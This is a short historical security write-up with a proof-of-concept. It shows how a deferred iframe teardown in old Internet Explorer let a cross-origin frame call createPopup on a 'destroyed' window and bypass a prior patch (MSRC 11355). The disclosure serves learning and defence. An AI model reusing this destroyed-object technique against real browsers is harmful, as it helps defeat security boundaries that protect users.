After a patch was issued for a createPopup security issue (MSRC 11355), I found a way to recreate the same effect by taking advantage of a timing window. When an iframe is destroyed by replacing its outerHTML, the actual teardown is deferred — leaving a brief window where the saved window reference is still alive and can be used to call createPopup.
<!-- index.html: main page hosting the cross-origin bypass frame -->
<iframe src="http://www.iframe.com/crash/06/bypass.html"></iframe><!-- bypass.html (cross-origin) -->
<script>
document.body.insertAdjacentHTML('beforeEnd', '<iframe id="tx"></iframe>'); // Insert an iFrame
w = document.all.tx.contentWindow; // Save its window object
document.all.tx.outerHTML = 1; // Destroy the iFrame
// The real destruction is deferred, so we still have the window object.
cp = w.createPopup(); // Use createPopup on the "destroyed" iFrame's window
cp.document.bgColor = "#8080dd";
cp.document.body.innerHTML = 'I am a createPopup coming from the iFrame on a different domain';
cp.show(0,0,200,100);
</script>The popup appeared on screen even though its source window had been nominally destroyed. Because the underlying window object was not yet collected, the popup ran in the context of the destroyed frame and was able to show content that the original patch was meant to prevent.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.